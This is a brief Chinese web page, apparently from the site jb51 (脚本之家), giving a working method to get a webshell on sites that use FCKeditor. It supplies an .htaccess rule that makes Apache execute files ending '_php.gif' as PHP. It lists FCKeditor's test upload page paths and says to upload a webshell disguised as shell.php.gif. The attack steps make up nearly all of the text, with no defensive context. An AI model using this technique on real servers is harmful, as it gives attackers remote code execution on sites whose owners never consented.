入侵防御

关注公众号 jb51net

关闭
网络安全 > 入侵防御 >

FCKeditor上传Getshell不要忘记htaccess

脚本之家

1.创建一个.htaccess文件,内容如下:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2.上传shell
www.badguest.cn FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/browser/default/connectors/test.html
这是上传地址,然后将你的webshell文件改后缀shell.php.gif